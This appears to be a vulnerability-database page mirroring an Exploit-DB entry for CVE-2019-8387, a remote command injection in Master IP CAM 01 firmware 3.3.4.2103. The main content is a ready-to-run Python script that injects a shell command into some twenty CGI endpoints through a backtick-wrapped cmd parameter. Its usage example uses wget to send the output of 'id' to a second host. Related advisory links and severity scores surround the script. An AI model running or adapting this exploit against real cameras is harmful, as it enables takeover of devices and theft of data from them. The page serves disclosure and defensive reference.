Lucene search
K

Master IP CAM 01 3.3.4.2103 - Remote Command Execution

🗓️ 18 Feb 2019 00:00:00Reported by Raffaele SabatoType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 42 Views

Master IP CAM 01 Remote Command Execution CVE-2019-838

Related
Code
ReporterTitlePublishedViews
Family
0day.today
Master IP CAM 01 3.3.4.2103 - Remote Command Execution Exploit
18 Feb 201900:00
zdt
Circl
CVE-2019-8387
13 Nov 202023:00
circl
CVE
CVE-2019-8387
8 May 201913:17
cve
Cvelist
CVE-2019-8387
8 May 201913:17
cvelist
exploitpack
Master IP CAM 01 3.3.4.2103 - Remote Command Execution
18 Feb 201900:00
exploitpack
NVD
CVE-2019-8387
8 May 201914:29
nvd
Packet Storm
Master IP CAM 01 3.3.4.2103 Remote Command Execution
18 Feb 201900:00
packetstorm
Prion
Command injection
8 May 201914:29
prion
RedhatCVE
CVE-2019-8387
22 May 202508:53
redhatcve
VulnCheck KEV
VulnCheck KEV: CVE-2019-8387
13 Dec 202300:00
vulncheck_kev
Rows per page
# Exploit Title: Master IP CAM 01 Remote Command Execution
# Date: 09-02-2019
# Remote: Yes
# Exploit Authors: Raffaele Sabato
# Contact: https://twitter.com/syrion89
# Vendor: Master IP CAM
# Version: 3.3.4.2103
# CVE: CVE-2019-8387

import sys
import requests


if len(sys.argv) < 3:
	print "[-] Usage: python MasterIpCamRCE.py <ip> <cmd>"
  	print "[-] Example: python MasterIpCamRCE.py 192.168.1.54 'wget http://192.168.1.55:4444/$(id)'"
  	exit(1)

host = sys.argv[1]
command = sys.argv[2]
page = [
		"bconf.cgi",
		"ddns_start.cgi",
		"getddnsattr.cgi",
		"getinetattr.cgi",
		"getnettype.cgi",
		"getupnp.cgi",
		"getwifiattr.cgi",
		"getwifistatus.cgi",
		"inetconfig.cgi",
		"iptest.cgi",
		"listwifiap.cgi",
		"p2p.cgi",
		"paraconf.cgi",
		"scanwifi.cgi",
		"setadslattr.cgi",
		"setddnsattr.cgi",
		"setinetattr.cgi",
		"setwifiattr.cgi",
		"upnp_start.cgi",
		"wifimode.cgi",
		"wifitest.cgi",
		]
for x in page:
	url = "http://"+host+"/cgi-bin/"+x+"?cmd=`"+command+"`"
	#url = "http://"+host+"/cgi-bin/"+x+"?action=`"+command+"`"
	print "[*] Attack on "+x
	print "[+] Sending the payload"
	r = requests.get(url)
	if r.status_code == 200:
		print "[+] Exploit Success"
		break

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

18 Feb 2019 00:00Current
9.8High risk
Vulners AI Score9.8
CVSS 27.5
CVSS 39.8
EPSS0.67478
42